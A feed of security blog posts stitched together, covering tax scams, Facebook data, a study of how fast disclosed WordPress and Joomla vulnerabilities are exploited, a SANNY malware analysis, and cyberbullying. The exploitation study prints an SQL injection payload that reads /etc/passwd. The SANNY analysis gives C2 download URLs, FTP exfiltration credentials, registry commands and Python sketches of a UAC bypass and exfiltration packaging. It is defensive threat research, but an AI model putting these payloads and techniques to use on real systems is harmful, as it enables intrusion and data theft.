To protect yourself, stay alert and be wary of any emails from financial groups or government agencies. Don’t share any information online, via email, phone, or by text, and don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data, criminals then attempt to file fraudulent tax returns to claim refunds. Or they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security numbers to commit other identity theft-related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses and payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim of identity theft, be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, report them to the IRS (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

How to download your Facebook data

With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.

The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.

If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.


You Stole My Sweater – Paul’s Security Weekly #552

Paul gives a tech segment on How to find the most innovative tech at a security show. In the news, we have updates from Alex Stamos, Facebook harvesting information about YOU, Uber self-driving car hits and kills pedestrian, and more on this episode of Paul's Security Weekly!



Life Cycle of a Web App 0 Day


Over the past few months, I’ve been monitoring the proliferation of exploits for some of my disclosed WordPress plugin and Joomla extension vulnerabilities against Akamai customers. I began this observation expecting a predictable conclusion: severe vulnerabilities like SQL injection, RFI, and LFI would receive the most attention on any CMS platform, while less severe vulnerabilities such as XSS and path disclosure would receive less attention from attackers.

The initial idea was to track three of my own disclosures after they had been published and see how much time elapsed until they were weaponized and exploitation attempts appeared in the wild. In total, I had released three previously unknown SQL injection vulnerabilities in three well-known Joomla extensions. These vulnerabilities had been remedied by the original authors prior to the research being published, and the disclosures appeared to go unnoticed by the black hat community.

This paper examines the time elapsed between when a vulnerability is publicly disclosed and when we begin to observe widespread exploitation attempts by adversaries.

What Happened

The three disclosed vulnerabilities, released last September, are listed in the following table. Each advisory details a SQL injection vulnerability that does not require the attacker to have a login on the target’s website:

Date       | Description                             | CVE ID
2016-09-16 | Huge-IT Portfolio Gallery Plugin v1.0.6 | CVE-2016-1000124
2016-09-15 | Huge-IT Video Gallery v1.0.9            | CVE-2016-1000123
2016-09-16 | Huge-IT Catalog v1.0.7 for Joomla       |

After nearly a year, I decided to investigate what might be causing my disclosures to be ignored. I looked at other SQL injection vulnerabilities in Joomla extensions that were turning up in Akamai’s attack logs and found an obvious difference. While my advisories had permeated the usual exploit curator websites, like Packet Storm, they had not made it over to exploit-db and CXsecurity. Two days after submitting all three exploits to exploit-db, I found a hit in Akamai’s logs. The attack attempt originated from an IP address belonging to a telecommunications company in North Africa. They were targeting a .mil website with the SQL injection in Huge-IT Portfolio v1.0.9 using SQLmap.

Path: ajax_url.php
Query: QmX=6156 AND 1=1 UNION ALL SELECT 1,NULL,'alert("XSS")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')
User-Agent: sqlmap/ (
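As an illustration (not Akamai’s actual WAF logic), a minimal log-triage script might flag query strings like the one above with a few regular-expression signatures. The patterns below are illustrative and far from exhaustive:

```python
import re

# Illustrative SQLi signatures; a production WAF rule set is far broader.
SQLI_PATTERNS = [
    re.compile(r"UNION\s+ALL\s+SELECT", re.I),
    re.compile(r"information_schema\.", re.I),
    re.compile(r"xp_cmdshell", re.I),
]

def looks_like_sqli(query_string: str) -> bool:
    """Return True if any known SQLi signature matches the query string."""
    return any(p.search(query_string) for p in SQLI_PATTERNS)
```

Run against the sqlmap query shown above, this flags the request on the `UNION ALL SELECT` signature alone.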

A second attack occurred five days later. This time the attacker targeted a Russian e-commerce site by attempting to redirect the malicious requests through a popular online auction house. The requests appear to be looking for other injection points, since each request placed a single quote (') at a different query parameter.

Query: option=com_catalog&_sacat=&_ex_kw='A=0&_mPrRngCbx=1&_udlo=&_udhi=&_sop=12&_fpos=&_fspt=1&_sadis=&LH_CAds=&task=viewitem&secid=13&id=34&Itemid=10&rmvSB=true


It seemed that the malicious actors were using the exploit-db and CXsecurity websites specifically as their RSS feed of vetted, working exploits. Conversely, while advisories published on Packet Storm were quite relevant to the information security industry as a whole, they were not formatted into easily consumable exploits as curated by websites like exploit-db and their ilk. Not to leave the most popular CMS out of the fun, I also publicly disclosed a path traversal vulnerability in a WordPress plugin named Membership Simplified [CVE-2017-1002008]. I released the details on March 14th, 2017 and began seeing entries in our logs on Saturday, March 18, 2017 at 9:00:00 PM, just four days later. This response time was in stark contrast to my Joomla extension publications.

Why are newly disclosed WordPress plugin vulnerabilities so aggressively pursued? One possible theory is that there are multiple open source tools and frameworks available to scan for plugin vulnerabilities on WordPress websites. These freely available tools are lacking for the Joomla platform.

It is not just the severity of the vulnerability but the proliferation of the software platform that increases its target footprint. WordPress has an enormous market share of the content management software in production on the internet. There are entire frameworks, websites and even companies focused on WordPress core and plugin security.

What about a truly severe vulnerability? Something that doesn’t require authentication and allows the attacker to change content, possibly even execute code?

Earlier this year, a researcher at Sucuri, Marc-Alexandre Montpas, released a vulnerability affecting WordPress < 4.7.2. The vulnerability abuses a type juggling bug where any non-integer input bypasses the authentication mechanism, allowing a remote unauthenticated attacker to modify any blog post.

I started monitoring attack traffic, via Akamai log files, for this specific vulnerability immediately after it had been made public. The WordPress JSON API vulnerability was assigned CVE-ID CVE-2017-1001000. It first popped up in our attack logs on Wed, 01 Feb 2017 18:00:00 GMT or around 1PM EST just three hours after Sucuri made their blog post public on their site.

It took only three hours after the vulnerability went public for exploit attempts against Akamai customers to turn up in the logs. A few months on, the logs show only a few thousand attempts per day, primarily targeting government and military websites. Most of the log entries were generated by the customers themselves; in addition, large portions of these scans originate from security companies performing web application security assessments for said customers. The log entries that didn’t originate from a security company or the target’s own DMZ tended to be POST requests rather than GET, I assume to minimize noise and to attempt to bypass WAF filters, as there were many ways to deliver the JSON payload when exploiting this vulnerability.

Shortly after the disclosure by Marc and Sucuri, an article was published stating that over 1.5 million websites had been compromised using this vulnerability. Why was I not seeing the same widespread exploitation attempts against Akamai customers? The answer was simple: the majority of Akamai customers aren’t running WordPress, and the attackers were using Google dorks to determine which sites were.

A Google dork is an advanced search query used to increase Google’s search granularity. To get a quick idea of how many websites rely on WordPress, I searched Google for URLs containing the string /wp-content, which returns “About 280,000,000 results”.

In an attempt to further my examination of these attacks, I examined other exploits against Joomla, as it is the second most popular CMS employed by internet websites. I found that, again, SQL injection and path traversal vulnerabilities were the most popular. The top Joomla examples are listed here, but I primarily focus on WordPress because of its deep penetration into the content management ecosystem.

I discovered that with attacks focusing on Joomla extensions, the majority of the traffic originated from Virtual Private Servers (VPS) and appeared to be legitimate attack attempts. The logs revealed the opposite for WordPress: the majority of attack attempts originated from the target’s DMZ and were self-scans.


The com_rpl at the top of the above table is the result of an SQL injection via the pid parameter of a GET request in an extension called RealtyNA CRM (Client Relationship Management). This is designed to help Joomla based real estate websites manage inquiries on property for sale. The associated vulnerability was disclosed on December 15th 2016 and does not require the attacker to be authenticated to the site. It should be noted that the extension is no longer actively being maintained and has been pulled from Joomla’s code repository. The vendor RealtyNA has directed Joomla users towards its new WordPress plugin.

Most of the above Joomla extensions are vulnerable to SQL injection. When automated tools like SQLmap are used, they iterate through various payload types in an attempt to build a working SQL injection exploit. This is why the numbers are much higher than in the WordPress table below: SQLi attacks are much noisier than XSS or RFI.

Besides software popularity, the type of exploit matters: for example, an “Unrestricted File Upload” vulnerability isn’t going to trigger a WAF alert unless a rule was specifically written for it. A file upload vulnerability can be more severe than a path traversal vulnerability, yet it is not likely to set off nearly as many alarms when exploited, as it is harder to fingerprint, being an error in the code logic itself. The exploit is a normal-looking POST request devoid of any malicious content, unless the file payload is something obvious like the notorious c99.php web shell.

With WordPress running on 28.7% of all websites and Joomla coming in second place with 3.3%, the availability of website security assessment applications follows this trend. There are various utilities to assess the security of your WordPress and Joomla websites; a few popular ones are listed below.

Application Name | CMS    | Project Page
Joomla VS        | Joomla |

The majority of utilities out there appear to run on the command line, while some are directly integrated into your CMS installation.

The logs I collected retain attack data for 30 days. I examined recently released vulnerabilities as well as well-known ones to study which were most scanned for over a 30-day period. I filtered out known penetration testing companies from the logs and removed entries where the connection originated from the target’s own network. The Alerts field contains the number of actual payloads that were blocked by Akamai’s WAF; it does not contain benign probe requests from web application vulnerability scanners.


When examining the log entries for the Jetpack WordPress plugin, I expected most entries to be attempts to exploit a SQL injection or local file inclusion vulnerability, or perhaps even the latest Jetpack vulnerability disclosed by Sucuri, a stored XSS. Instead, the majority of the scans appeared to simply verify whether Jetpack had been installed. If it was, further checks were made for the existence of specific files like class.jetpack-xmlrpc-server.php or example.html; this, it seems, was an attempt to exploit CVE-2014-0173, a bypass vulnerability allowing unrestricted access to some of the RPC calls packaged with WordPress.

The majority of plugins being scanned for have been public for many months, in some cases years. Why do scans continue for legacy vulnerable plugins? The reason is that vulnerability assessment tools scan for the existence of all known vulnerable plugins, usually by testing for a specific file known to be packaged with each one.
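A sketch of that fingerprinting approach: probe each site for a file a plugin is known to ship with. The plugin list and paths below are illustrative placeholders, not drawn from any real scanner’s database:

```python
# Sketch of how scanners fingerprint WordPress plugins: request a file
# each plugin is known to ship with. Paths here are illustrative.
KNOWN_PLUGIN_FILES = {
    "jetpack": "wp-content/plugins/jetpack/readme.txt",
    "membership-simplified": "wp-content/plugins/membership-simplified/readme.txt",
}

def build_probe_urls(base_url: str) -> dict:
    """Map each plugin name to the URL a scanner would request for it."""
    base = base_url.rstrip("/")
    return {name: f"{base}/{path}" for name, path in KNOWN_PLUGIN_FILES.items()}

# A scanner would then issue a GET for each URL; an HTTP 200 indicates the
# plugin is present, after which version-specific checks can run.
```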
Plugin Security – Now

I started re-evaluating plugin security a year later, using the same methodology as before: downloading plugins and manually examining the PHP code for common vulnerabilities like SQLi, XSS, LFI, and RFI. I found that plugins that have not been updated in several months pose the most risk. I also discovered that plugins with more than 100 but fewer than 1,000 downloads haven’t been updated in an average of 991 days, as of the time of writing, or almost three years. The average plugin from my sample data hasn’t been updated in 1,050 days.

# Plugin Downloads     | Avg Days Since Last Update
9,999,999 - 1,000,000  | 150
999,999 - 100,000      | 458
99,999 - 10,000        | 941
9,999 - 1,000          | 1296
999 - 100              | 991
< 99                   | 107*

* This is because these are newly uploaded plugins actively being developed.
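The bucketing behind the table above can be sketched as follows. The sample records are made up for illustration; the real figures came from my plugin survey:

```python
from datetime import date

# Made-up sample records; the real survey covered many more plugins.
plugins = [
    {"downloads": 2_500_000, "last_update": date(2017, 10, 1)},
    {"downloads": 450, "last_update": date(2015, 1, 15)},
]

# (low, high) download-count buckets matching the table above.
BUCKETS = [(1_000_000, 9_999_999), (100_000, 999_999), (10_000, 99_999),
           (1_000, 9_999), (100, 999), (0, 99)]

def bucket_averages(records, today=date(2018, 3, 1)):
    """Average days-since-last-update per download bucket."""
    totals = {b: [0, 0] for b in BUCKETS}
    for rec in records:
        for lo, hi in BUCKETS:
            if lo <= rec["downloads"] <= hi:
                totals[(lo, hi)][0] += (today - rec["last_update"]).days
                totals[(lo, hi)][1] += 1
                break
    return {b: t[0] // t[1] for b, t in totals.items() if t[1]}
```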


When I originally began my research into this type of widespread exploitation of recently published vulnerabilities, I had some expectations as to how it would turn out. I had expected the same categories of vulnerabilities across all platforms to receive equal amounts of attention. What I found was that specific vulnerabilities like LFI were favored over others that I had expected to be more popular, such as SQL injection.

What I did not expect was the amount of traffic generated by widespread deployment of scanning tools by enterprise IT staff. While multiple routine daily self-scans appear excessive, at least they’re focused on their own sites’ security. With new vulnerability scanning tools becoming readily available, it’s important that software is audited and that vulnerabilities are responsibly reported, fixed, and publicly disclosed. This cycle of research, repair, and publication is currently the best way to keep systems safe and secure.

The post Life Cycle of a Web App 0 Day appeared first on Liquidmatrix Security Digest.

The High Price of Not STFU: Guccifer 2.0 Reportedly Identified

Photo Credit: republica

Recently, we learned that authorities appear to have identified our friend, Guccifer 2.0. The key slip: amid Guccifer 2.0’s frequent communications via Twitter and ProtonMail, on one occasion he neglected to notice he was not connected to his favorite VPN service, Elite VPN. As a result, authorities were able to capture his actual IP address while he was communicating openly in the course of his portion of the influence operation.

Looking Ahead to RSA: Talking Open Source Components

The marquee event of the security industry is fast approaching – the 2018 RSA Conference will take place in San Francisco April 16 to 20. This is a highlight of the year for all of us at CA Veracode, and we will have a major presence there, in part because of the sheer size of this event – both in terms of attendance and scale. It’s definitely the leading business-focused security show, and we know that every AppSec vendor will be there, along with every AppSec practitioner from both a manager and purchasing perspective.

Why attend

Are you planning to attend? I always find this event valuable, and look forward to attending every year. In particular, I always come home with a new understanding of the current security problems that are top of mind for most organizations, and that they are trying to solve. Security is a fast-moving space, and both the problems and solutions are constantly evolving. For instance, when CA Veracode first started going to RSA, we spent a lot of time at the booth answering “what is application security?” Then in a few short years, we were fielding questions from attendees desperate for guidance on getting an AppSec program off the ground as soon as possible.

What I think will be a hot topic

This year, one of the problems I expect to hear a lot about is also the subject of my speaking session – the risk of open source components. We’re finding this is a top-of-mind issue among our customer base, and visibility is most often the crux of the issue. Developers have increasingly incorporated open source components into the code they’re writing, resulting in applications that today often feature more open source code than in-house code. In fact, 70 percent to 90 percent of Java applications are now made up of open source components. But what if there’s an announcement about a serious vulnerability in an open source component? Would you know if it’s in use in your organization? Most likely, you would not. In my speaking session, I’ll explore this problem and offer some practical tips on balancing the need for speed with the need for security.

Check out this short video featuring more of my thoughts on application security in general, and RSA in particular.

And find out more about CA Veracode’s presence at RSA this year.

Hope to see you there!

SANNY Malware Delivery Method Updated in Recently Observed Attacks


In the third week of March 2018, FireEye discovered, through its Dynamic Threat Intelligence, malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted with regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.

Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).

Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.

Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate
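The decode step can be reproduced outside of Windows. This Python sketch mirrors what `certutil -decode` does with the fake certificate; the sample payload below is fabricated for illustration (the real 1.txt held the attackers’ Stage 1 BAT script):

```python
import base64
import re

def decode_fake_pem(pem_text: str) -> bytes:
    """Strip the BEGIN/END markers and Base64-decode the body, as
    `certutil -decode` does with a PEM-style file."""
    body = re.sub(r"-----(BEGIN|END) CERTIFICATE-----", "", pem_text)
    return base64.b64decode("".join(body.split()))

# Fabricated stand-in for the hosted 1.txt.
fake_cert = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.b64encode(b"@echo off\r\nrem stage-1 BAT payload\r\n").decode()
    + "\n-----END CERTIFICATE-----\n"
)
```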

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (a component inside the CAB file):

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:

  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:

  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:
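For illustration, the registry change behind step 2 follows the standard svchost service-DLL hijack, where the ServiceDll value under a service’s Parameters key controls which DLL svchost.exe loads. The exact command strings below are assumptions based on that technique, not strings recovered from install.bat:

```python
# Hypothetical reconstruction of the COMSysApp hijack commands.
SERVICE = "COMSysApp"
MALICIOUS_DLL = r"%SystemRoot%\System32\ipnet.dll"

hijack_commands = [
    f"sc stop {SERVICE}",
    # Point the service's ServiceDll at the malicious DLL.
    (rf"reg add HKLM\SYSTEM\CurrentControlSet\Services\{SERVICE}\Parameters"
     rf" /v ServiceDll /t REG_EXPAND_SZ /d {MALICIOUS_DLL} /f"),
    f"sc start {SERVICE}",
]
```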

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017
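As an illustrative sketch (a reimplementation for clarity, not the sample's own routine), the file can be decoded by translating the first 64 symbols of the custom alphabet onto the standard Base64 alphabet:

```python
import base64

# Custom alphabet from ipnet.ini (65 symbols; treating the first 64 as
# the data alphabet, and the padding handling below, are assumptions).
CUSTOM = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def custom_b64decode(data: str) -> bytes:
    """Map custom symbols onto the standard alphabet, then decode."""
    translated = data.translate(str.maketrans(CUSTOM[:64], STD))
    translated += "=" * (-len(translated) % 4)  # restore any stripped padding
    return base64.b64decode(translated)
```

Running the real ipnet.ini through such a routine is what yields the FTP host and credentials above.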

The malware then connects to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server to “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of a file with the “to everyone” substring, the malware will download the file and then perform actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip command allows the attacker to migrate the malware to a new FTP C2 server. The command has the following syntax:

  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c” but is not followed by any of the previously described commands (chip, pull, or put), then the malware directly executes the command on the machine using WinExec.
  • /user command: This command executes a command on the system as the logged-in user. It duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

The supported C2 commands are summarized below:

  • chip – Update the FTP server config file
  • pull – Upload a file from the machine
  • put – Copy an existing file to a new destination
  • /user – Create a new process with explorer.exe access token
  • default – Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages the Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of the IShellDispatch interface to compress the collected data and write it to the ZIP file.
  4. Reads the contents of the ZIP file into memory.
  5. Deletes the ZIP file from disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. Base64-encodes the ZIP contents (using the same custom character set mentioned in the previous FTP Config File section) and writes them to %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to a remote file with the format: “from <computer_name_timestamp>.txt”
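The packaging steps above can be sketched as follows, using Python's zipfile module in place of the Shell.Application CopyHere call the malware uses (the entry name and padding handling are assumptions for illustration):

```python
import base64
import io
import zipfile

# Custom alphabet recovered from the sample (see the FTP Config File section).
CUSTOM = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def package_for_exfil(collected: bytes) -> str:
    # Compress the collected data into an in-memory ZIP; the malware drives
    # Shell.Application's CopyHere method rather than a ZIP library.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sysinfo.txt", collected)  # hypothetical entry name
    # Base64-encode with the custom alphabet; this sketch drops padding,
    # which may differ from the sample's behaviour.
    encoded = base64.b64encode(buf.getvalue()).decode().rstrip("=")
    return encoded.translate(str.maketrans(STD, CUSTOM[:64]))
```

The resulting string corresponds to what is written to %temp%\post.txt and pushed to the FTP server with FtpPutFileW.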

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file is extracted to the %windir%\system32 directory, after which the BAT file executes the cliconfg command.

The purpose of this DLL module is to launch the install.bat file. cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility) that loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to set up the Windows registry for UAC bypass:

  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:

  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:
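The fodhelper technique referenced in step 2 is publicly documented: fodhelper.exe auto-elevates and consults a user-writable ms-settings handler key. As an illustration (registry paths are from public write-ups of the technique; the payload path is hypothetical, not the sample's exact commands):

```python
# Publicly documented fodhelper.exe UAC bypass: fodhelper auto-elevates
# and reads the HKCU ms-settings handler, so a command planted there runs
# elevated without a UAC prompt.
KEY = r"HKCU\Software\Classes\ms-settings\Shell\Open\command"
PAYLOAD = r"%windir%\System32\install.bat"  # hypothetical payload path

setup_cmds = [
    f'reg add {KEY} /d "{PAYLOAD}" /f',
    f'reg add {KEY} /v DelegateExecute /t REG_SZ /d "" /f',  # must exist, empty
    "fodhelper.exe",  # launching it triggers elevated execution of PAYLOAD
]
```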


This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Malicious documents:

  • РГНФ 2018-2019.doc
  • Copy of communication from Security Council Committee (1718).doc

Samples (SHA256):

  • a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 (64-bit)
  • a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 (32-bit)

Cyberbullying – How Parents Can Minimize Impact On Kids

Cyberbullying: if you have a tween or teen and haven’t workshopped this with your kids then you need to put a time in the diary now. Cyberbullying is one of the biggest challenges our children’s generation will face and unfortunately, it isn’t going away.

The recent tragic suicide of 14 year old Aussie girl Amy ‘Dolly’ Everett as a result of online bullying needs to be a wake-up call for parents. Many kids who are bullied online feel completely ashamed and publicly humiliated and can’t see a way past the embarrassment. They don’t have the skills to handle it and don’t know where to seek help. Yes, we are first-generation digital parents BUT we need to prioritise our children’s safety and well-being online. And sort this out FAST!

How Big An Issue Is Cyberbullying?


In its 2016-17 annual report, the Office of the e-Safety Commissioner reveals an increase of 60% in the reported cases of cyberbullying compared with the previous year. The report also shows that:

  • Aussie tweens/teens between the ages of 12 and 16 are the primary targets of cyberbullying
  • Girls made up 63% of the victims

And it isn’t just us parents that consider this to be a big issue – our teens are also concerned. A study of 5000 teens across eleven countries by Vodafone in 2015 showed that in fact over half the teens surveyed considered cyberbullying to be worse than face-to-face bullying, and that 43% believe it is a bigger problem for young people than drug abuse!

So, clearly we have a problem on our hands – and one that isn’t getting better over time.

Why Is Cyberbullying Occurring More Frequently?

Many parenting experts believe a lack of empathy to be a major factor in cyberbullying. In her book, Unselfie, US Parenting Expert Dr Michele Borba explains that we are in the midst of an ‘empathy crisis’ which is contributing to bullying behaviour. She believes teens today are far less empathetic than they were 30 years ago.

